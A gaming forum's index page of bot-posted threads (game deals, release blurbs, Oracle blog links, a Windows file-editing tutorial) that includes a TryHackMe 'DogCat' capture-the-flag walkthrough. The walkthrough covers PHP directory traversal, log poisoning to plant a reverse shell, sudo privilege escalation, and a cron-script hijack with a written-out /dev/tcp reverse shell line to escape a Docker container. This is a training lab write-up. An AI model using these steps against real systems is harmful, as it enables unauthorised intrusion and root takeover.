Create an account


Welcome, Guest
You have to register before you can post on our site.

Username
  

Password
  





Search Forums

(Advanced Search)

Forum Statistics
» Members: 20,106
» Latest member: levihaxk
» Forum threads: 21,748
» Forum posts: 22,613

Full Statistics

Online Users
There are currently 729 online users.
» 0 Member(s) | 724 Guest(s)
Applebot, Baidu, Bing, Google, Yandex

 
  (Indie Deal) FREE Through the Mirror, THQ Adventures, Mystery & Horror Sale
Posted by: xSicKxBot - 03-07-2023, 01:35 PM - Forum: Deals or Specials - No Replies

FREE Through the Mirror, THQ Adventures, Mystery & Horror Sale

[freebies.indiegala.com]
[freebies.indiegala.com]

THQ Nordic Adventures, Mystery & Horror Sale, up to 80% OFF
[www.indiegala.com]
[www.indiegala.com]

Ex Natura: Nature Corrupted
[www.indiegala.com]
https://www.youtube.com/watch?v=FbUTME6DBm0&embeds_euri=https%3A%2F%2Fwww.indiegala.com%2F&feature=emb_imp_woyt&ab_channel=BlackburneGames

Medibang Adult Sale, up to 60% OFF
[www.indiegala.com]
[www.indiegala.com]

Patch Quest
[www.indiegala.com]
https://www.youtube.com/watch?v=cj409KY5qHE&embeds_euri=https%3A%2F%2Fwww.indiegala.com%2F&feature=emb_imp_woyt&ab_channel=PatchQuest


https://steamcommunity.com/groups/indieg...1920654318

Print this item

  (Indie Deal) Star Wars Giveaways, Wo Long is out, 2K & Racing Deals
Posted by: xSicKxBot - 03-06-2023, 09:12 PM - Forum: Deals or Specials - No Replies

Star Wars Giveaways, Wo Long is out, 2K & Racing Deals

Vorax Pre-Purchase
[vorax.indiegala.com]
Pre-orders are now open for Vorax! This is your chance to grab the game at a much lower cost! For more info, please visit our faq section.[vorax.indiegala.com]

Giveaways
[www.indiegala.com]
Wo Long: Fallen Dynasty
[www.indiegala.com]
https://www.youtube.com/watch?v=_O1DrfIxY1I&embeds_euri=https%3A%2F%2Fwww.indiegala.com%2F&feature=emb_imp_woyt&ab_channel=KOEITECMOEUROPELTD.
2K Sale, up to 92% OFF
[www.indiegala.com]

Voltaire: The Vegan Vampire
[www.indiegala.com]
https://www.youtube.com/watch?v=b0bge-DNVys&ab_channel=FreedomGames
505 Racing Sale, up to 84% OFF
[www.indiegala.com]



https://steamcommunity.com/groups/indieg...1913137903

Print this item

  (Free Game Key) Figment - Free GOG Game
Posted by: xSicKxBot - 03-06-2023, 09:12 PM - Forum: Deals or Specials - No Replies

Figment - Free GOG Game

Figment - Free GOG Game
This giveaway is on gog.com gog is a platform for games that is dedicated to drm-free games (those are games that do not require login or registration to play the game)

How to grab Figment
- Go to the home page of https://www.gog.com/#giveaway

?GrabFreeGames.com ?Twitter ?Steam Curator ?Facebook[fb.me]?Discord[discord.gg]
❤️Support us: HumbleBundle Partner[www.humblebundle.com] Fanatical Affiliate[www.fanatical.com]


https://steamcommunity.com/groups/GrabFr...2476462869

Print this item

  PC - Destiny 2: Lightfall
Posted by: xSicKxBot - 03-06-2023, 09:12 PM - Forum: New Game Releases - No Replies

Destiny 2: Lightfall



The last stand against Calus--who became the latest disciple of The Witness at the end of Season of the Haunted--and a "pivotal" moment for the Destiny franchise as it heads to the end of the Light and Darkness saga. Lightfall takes place in a new city on Neptune, Neomuna, which has a pristine and retro-futuristic design. As for the fifth subclass that was briefly seen, this new Darkness power is called Strand and allows for new traversal methods in Neomuna. The city is inhabited by a new race known as Cloudstriders, who managed to escape The Collapse of the solar system and remain hidden from the Darkness. With The Witness having discovered the city, it has come under siege from Calus, the Shadow Legion, and gigantic Pyramid Demons that can use a scythe to attack from a distance and drain your life-force.

Publisher: Bungie

Release Date: Feb 28, 2023




https://www.metacritic.com/game/pc/destiny-2-lightfall

Print this item

  [Oracle Blog] Announcing Java Card 3.2 Release
Posted by: xSicKxBot - 03-06-2023, 04:42 AM - Forum: Java Language, JVM, and the JRE - No Replies

Announcing Java Card 3.2 Release

With the whole Java Card team, I am delighted to announce the new Java Card 3.2 release. It is now live and available on the portal of Oracle.


https://blogs.oracle.com/java/post/annou...32-release

Print this item

  [Tut] TryHackMe DogCat Walkthrough [+ Easy Video]
Posted by: xSicKxBot - 03-06-2023, 04:41 AM - Forum: Python - No Replies

TryHackMe DogCat Walkthrough [+ Easy Video]

5/5 – (1 vote)

CHALLENGE OVERVIEW


YouTube Video

  • Link: THM Dogcat
  • Difficulty: Medium
  • Target: Flags 1-4
  • Highlight: intercepting and modifying a web request using burpsuite 
  • Tools used: base64, burpsuite
  • Tags: docker, directory traversal

BACKGROUND



In this tutorial, we will walk a simple website showing pictures of dogs and cats.

We’ll discover a directory traversal vulnerability that we can leverage to view sensitive files on the target machine.

At the end of this challenge, we will break out of a docker container in order to capture the 4th and final flag.

ENUMERATION/RECON



export target=10.10.148.135
Export myIP=10.6.2.23

Let’s walk the site.

It looks like a simple image-viewing site that can randomize images of dogs and cats. After toying around with the browser addresses, we find that directory traversal allows us to view other files.

Let’s see if we can grab the HTML code that processes our parameters in the browser address. This will help us understand what is happening on the backend.

We’ll use a simple PHP filter to convert the contents to base64 and output the raw base64 string.

http://10.10.148.135/?view=php://filter/...g/../index

Raw output:

PCFET0NUWVBFIEhUTUw+CjxodG1sPgoKPGhlYWQ+CiAgICA8dGl0bGU+ZG9nY2F0PC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiIGhyZWY9Ii9zdHlsZS5jc3MiPgo8L2hlYWQ+Cgo8Ym9keT4KICAgIDxoMT5kb2djYXQ8L2gxPgogICAgPGk+YSBnYWxsZXJ5IG9mIHZhcmlvdXMgZG9ncyBvciBjYXRzPC9pPgoKICAgIDxkaXY+CiAgICAgICAgPGgyPldoYXQgd291bGQgeW91IGxpa2UgdG8gc2VlPzwvaDI+CiAgICAgICAgPGEgaHJlZj0iLz92aWV3PWRvZyI+PGJ1dHRvbiBpZD0iZG9nIj5BIGRvZzwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iLz92aWV3PWNhdCI+PGJ1dHRvbiBpZD0iY2F0Ij5BIGNhdDwvYnV0dG9uPjwvYT48YnI+CiAgICAgICAgPD9waHAKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICAkZXh0ID0gaXNzZXQoJF9HRVRbImV4dCJdKSA/ICRfR0VUWyJleHQiXSA6ICcucGhwJzsKICAgICAgICAgICAgaWYoaXNzZXQoJF9HRVRbJ3ZpZXcnXSkpIHsKICAgICAgICAgICAgICAgIGlmKGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICdkb2cnKSB8fCBjb250YWluc1N0cigkX0dFVFsndmlldyddLCAnY2F0JykpIHsKICAgICAgICAgICAgICAgICAgICBlY2hvICdIZXJlIHlvdSBnbyEnOwogICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgJF9HRVRbJ3ZpZXcnXSAuICRleHQ7CiAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgIGVjaG8gJ1NvcnJ5LCBvbmx5IGRvZ3Mgb3IgY2F0cyBhcmUgYWxsb3dlZC4nOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgPz4KICAgIDwvZGl2Pgo8L2JvZHk+Cgo8L2h0bWw+Cg== 

Let’s save this string as a file named “string”. Then we can use the command “cat string | base64 -d” to decrypt this string and view it as raw HTML code.


Reading over this HTML code, we can see that the file extension can be set!

If the user doesn’t specify the extension, the default will be .php. This means that we can add “&ext=” to the end of our web address to avoid the .php extension from being added.

In order for it to properly display our request, we need to include the word “dog” or “cat” in the address.


Let’s dive in with burpsuite and start intercepting and modifying requests.

Here is our order of steps for us to get our initial foothold on the target machine:

  1. Create a PHP reverse shell
  2. Start up our netcat listener
  3. Use burp to intercept and modify the web request. Wait until later to click “forward”.
  4. Spin up a simple HTTP server with Python in the same directory as the PHP revshell.
  5. Click “forward” on burp to send the web request.
  6. Activate the shell by entering: $targetIP/bshell.php in the browser address
  7. Catch the revshell on netcat!

STEP 1


Let’s create a PHP pentest monkey revshell.


STEP 2


Let’s first start up a netcat listener on port 2222.

nc -lnvp 2222

STEP 3


Intercept the web request for the Apache2 log and modify the User-Agent field with a PHP code to request the shell.php code and rename it bshell.php on the target machine.

This will work only because upon examining the Apache2 logs, we noticed that the User-Agent field is unencoded and vulnerable to command injection. Make sure to wait to click forward until step 5.


STEP 4


We’ll spin up a simple python HTTP server in the same directory as our revshell to serve shell.php to our target machine via the modified web request we created in burpsuite.


STEP 5


Click forward on burp and check to see if code 200 came through for shell.php on the HTTP server.


STEP 6


We can activate the shell from our browser now and hopefully catch it as a revshell on our netcat listener.


STEP 7


We successfully caught it! Now we are in with our initial foothold!


INITIAL FOOTHOLD



LOCATE THE FIRST FLAG

Let’s grab the first flag. We can grab it from our browser again in base64, or via the command line from the revshell.

http://10.10.148.135/?view=php://filter/...og/../flag
PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2dfYWI2N2VkZmF9Igo/Pgo=

Now we can decode this string (saved as firstflag.txt) with base64:

base64 --decode firstflag.txt <?php
$flag_1 = "THM{Th—------------ommitted—-------fa}"
?>

LOCAL RECON



LOCATE THE SECOND FLAG


We manually enumerate the filesystem and discover the second flag at /var/www/flag2_QMW7JvaY2LvK.txt

Using the command find can help us quickly scan the filesystem for any files which contain the word “flag”.

find / -type f -name '*flag*' 2>/dev/null

We found the second flag in plaintext!

cat flag2_QMW7JvaY2LvK.txt
THM{LF—------------ommitted—-------fb}

CHECK SUDO PERMISSIONS


Let’s check out our sudo permissions with the command:

sudo -l
Matching Defaults entries for www-data on 26e23794a52b: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User www-data may run the following commands on 26e23794a52b: (root) NOPASSWD: /usr/bin/env

EXPLOIT/PRIVILEGE ESCALATION



Because we have sudo permissions without a password to run the env bin, we can easily become root with the command:

$ sudo env /bin/bash

Now we can verify that we are root with the command whoami.

GRAB THE THIRD FLAG 


cd /root
ls
flag3.txt
cat flag3.txt
THM{D1—------------ommitted—-------12}

POST-EXPLOITATION – BREAK OUT OF THE DOCKER CONTAINER


Let’s start up a new listener to catch the new bash shell outside of the container.

nc -lnvp 3333

We notice that there is a backup.sh that regularly runs on a schedule via cronjobs. We can hijack this file which is run by root outside of the docker container, by changing the contents to throw a revshell.

echo "#!/bin/bash">backup.sh;echo "bash -i>/dev/tcp/10.6.2.23/3333 0>&1">>backup.sh
flag4.txt
cat flag4.txt
THM{esc—------------ommitted—-------2d}

FINAL THOUGHTS



This box was a lot of fun. The bulk of the challenge was working towards gaining the initial foothold.

Once we secured a revshell, the rest of the box went pretty quickly.

The final step of breaking out of a docker container with a second revshell was the sneakiest part for me.

The PHP directory traversal and using a php filter to encode with base64 was also a cool way to evade the data sanitation measures in place on the backend.



https://www.sickgaming.net/blog/2023/03/...asy-video/

Print this item

  (Indie Deal) FREE SKI..ID, Let's Go Bundle, Konami & Ubisoft Deals
Posted by: xSicKxBot - 03-06-2023, 04:40 AM - Forum: Deals or Specials - No Replies

FREE SKI..ID, Let's Go Bundle, Konami & Ubisoft Deals

SKIID Freebie
[freebies.indiegala.com]

Let's Go Bundle | 8 Steam Games | 91% OFF
[www.indiegala.com]
New month, new bundle, new games..., the weekend's here, let's goooooooo! Grab the newest selection of indie Steam games brought by the Let's Go Bundle.
Konami Sale, up to 92% OFF
[www.indiegala.com]

Aces & Adventures
[www.indiegala.com]
https://www.youtube.com/watch?v=pS51VX9pjXM&ab_channel=YogscastGames
v=pS51VX9pjXM&ab_channel=YogscastGames
Ubisoft Sale, up to 80% OFF
[www.indiegala.com]

Elderand
[www.indiegala.com]
https://www.youtube.com/watch?v=Zk1xCC9p7NA&ab_channel=GraffitiGames


https://steamcommunity.com/groups/indieg...1908430636

Print this item

  PC - Wo Long: Fallen Dynasty
Posted by: xSicKxBot - 03-06-2023, 04:40 AM - Forum: New Game Releases - No Replies

Wo Long: Fallen Dynasty



Wo Long: Fallen Dynasty follows the dramatic, action-packed story of a nameless militia soldier fighting for survival in a dark fantasy version of the Later Han Dynasty where demons plague the Three Kingdoms. Players fight off deadly creatures and enemy soldiers using swordplay based on the Chinese martial arts, attempting to overcome the odds by awakening the true power from within.

Publisher: Koei Tecmo Games

Release Date: Mar 03, 2023




https://www.metacritic.com/game/pc/wo-lo...en-dynasty

Print this item

  [Oracle Blog] TruffleRuby on OCI Container Instances
Posted by: xSicKxBot - 03-05-2023, 08:32 AM - Forum: Java Language, JVM, and the JRE - No Replies

TruffleRuby on OCI Container Instances

A quick introduction to Ruby on GraalVM and how to run it on OCI Container Instances.


https://blogs.oracle.com/java/post/truff...-instances

Print this item

  [Tut] 5 Easy Ways to Edit a Text File From Command Line (Windows)
Posted by: xSicKxBot - 03-05-2023, 08:32 AM - Forum: Python - No Replies

5 Easy Ways to Edit a Text File From Command Line (Windows)

5/5 – (1 vote)

Problem Formulation



Given is a text file, say my_file.txt. How to modify its content in your Windows command line working directory?

I’ll start with the most direct method to solve this problem in 90% of cases and give a more “pure” in-terminal method afterward.

Method 1: Using Notepad


The easiest way to edit a text file in the command line (CMD) on your Windows machine is to run the command notepad.exe my_text_file.txt, or simply notepad my_text_file.txt, in your cmd to open the text file with the visual editor Notepad.

notepad.exe my_file.txt

You can also skip the .exe prefix in most cases:

notepad my_text_file.txt

Now, you may ask:

? Is Notepad preinstalled in any Windows installation? The answer is: yes! Notepad is a generic text editor to create, open, and read plaintext files and it’s included with all Windows versions.

Here’s how that looks on my Win 10 machine:


When I type in the command notepad.exe my_text_file.txt, CMD starts the Notepad visual editor in a new window.

I can then edit the file and hit CTRL + S to save the new contents.

But what if you cannot open a text editor—e.g. if you’re logged into a remote server via SSH?

Method 2: Pure CMD Approach



If you cannot open Notepad or other visual editors for some reason, a simple way to overwrite a text file with built-in Windows command line tools is the following:

  • Run the command echo 'your new content' > my_file.txt to print the new content using echo and pipe the output into the text file my_text_file.txt using >.
  • Check the new content using the command type my_text_file.txt.
C:\Users\xcent\Desktop>echo 'hello world' > my_file.txt
C:\Users\xcent\Desktop>type my_file.txt 'hello world'

Here’s what this looks like on my Windows machine, where I changed my_file.txt to contain the text 'hello world!':


This is a simple and straightforward approach to small changes. However, if you have a large file and you just want to edit some minor details, this is not the best way.

Method 3: Change File Purely In CMD (Copy Con)


If you need a full-fledged solution to edit potentially large files in your Windows CMD, use this method! ?

To create a new file in Windows command prompt, enter copy con followed by the target file name (copy con my_file.txt). Then enter the text you want to put in the file. To end and save the file, press Ctrl+Z then Enter or F6 then Enter.

copy con my_file.txt

How this looks on my Win machine:


A couple of notes:

? Info: To edit an existing file, display the text by using the type command followed by the file name. Then copy and paste the text into the copy con command to make changes. Be careful not to make any typos, or you’ll have to start over again. Backspace works if you catch the mistake before pressing Enter. Note that this method may not work in PowerShell or other command line interfaces that don’t support this feature.

Method 4: If you SSH’d to a Unix Machine


Of course, if you have logged in a Unix-based machine, you don’t need to install any editor because it comes with powerful integrated editors such as vim or emacs.

One of the following three commands should open your file in a terminal-based editing mode:

vim my_text_file.txt
vi my_text_file.txt
emacs my_text_file.txt

You can learn more about Vim here.

Summary



To edit a file.txt in the command line, use the command notepad file.txt to open a graphical editor on Windows.

If you need a simple file edit in your terminal without a graphical editor and without installation, you can use the command echo 'new content' > file.txt that overwrites the old content in file.txt with new content.

If you need a more direct in-CMD text editor run copy con file.txt to open the file in editing mode.

If you’re SSH’d into a Unix machine, running the Vim console-based editor may be the best idea. Use vim file.txt or vi file.txt to open it.

Feel free to join our email coding academy (it’s free):

? Recommended: How to Edit a Text File in PowerShell (Windows)



https://www.sickgaming.net/blog/2023/03/...e-windows/

Print this item

 
Latest Threads
(Xbox One) Vantage - Mod ...
Last Post: levihaxk
2 hours ago
News - Christopher Nolan’...
Last Post: xSicKxBot
3 hours ago
Insta360 USA Coupon [INRS...
Last Post: tomen55
3 hours ago
Insta360 Coupon For Stude...
Last Post: tomen55
3 hours ago
Insta360 Content Creator ...
Last Post: tomen55
3 hours ago
Save 5% on Insta360 Produ...
Last Post: tomen55
3 hours ago
Insta360 Ace Pro 2 Promo ...
Last Post: tomen55
3 hours ago
Insta360 Coupon For Vlogg...
Last Post: tomen55
3 hours ago
Insta360 Promo [INRSG2ATO...
Last Post: tomen55
4 hours ago
Insta360 GO Ultra Coupon ...
Last Post: tomen55
4 hours ago

Forum software by © MyBB Theme © iAndrew 2016